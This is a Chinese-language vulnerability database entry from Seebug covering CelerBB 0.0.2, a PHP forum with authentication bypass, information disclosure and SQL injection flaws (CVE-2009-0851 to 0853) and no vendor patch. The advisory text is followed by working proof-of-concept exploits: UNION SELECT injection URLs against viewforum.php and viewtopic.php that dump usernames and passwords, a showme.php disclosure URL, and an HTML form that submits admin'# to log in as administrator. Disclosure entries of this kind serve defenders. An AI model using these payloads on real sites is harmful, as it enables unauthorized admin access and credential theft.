Lucene search

K
seebugRootSSV:4884
HistoryMar 11, 2009 - 12:00 a.m.

CelerBB多个输入验证和绕过认证漏洞

2009-03-1100:00:00
Root
www.seebug.org
10

EPSS

0.006

Percentile

79.4%

BUGTRAQ ID: 34014
CVE(CAN) ID: CVE-2009-0851,CVE-2009-0852,CVE-2009-0853

CelerBB是使用PHP编写的开源论坛程序。

在禁用magic_quotes_gpc的时候,远程攻击者可以通过向CelerBB的login.php模块提交特制的Username参数请求绕过认证获得管理访问。

远程攻击者可以通过向CelerBB的showme.php模块提交特制的user参数请求读取敏感信息。

在禁用magic_quotes_gpc的时候,远程攻击者可以通过向CelerBB的viewforum.php和viewtopic.php模块提交恶意的id参数请求执行SQL注入攻击。

CelerBB 0.0.2
厂商补丁:

CelerBB

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=“http://celerbb.sourceforge.net/” target=“_blank”>http://celerbb.sourceforge.net/</a>


                                                http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23
http://www.site.com/path/showme.php?user=admin

&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;CelerBB 0.0.2 Authentication Bypass Exploit&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;form action=&quot;login.php&quot; method=&quot;POST&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;Username&quot; value=&quot;admin'#&quot;&gt;
      &lt;input type=&quot;submit&quot; value=&quot;Exploit&quot;&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

                              

EPSS

0.006

Percentile

79.4%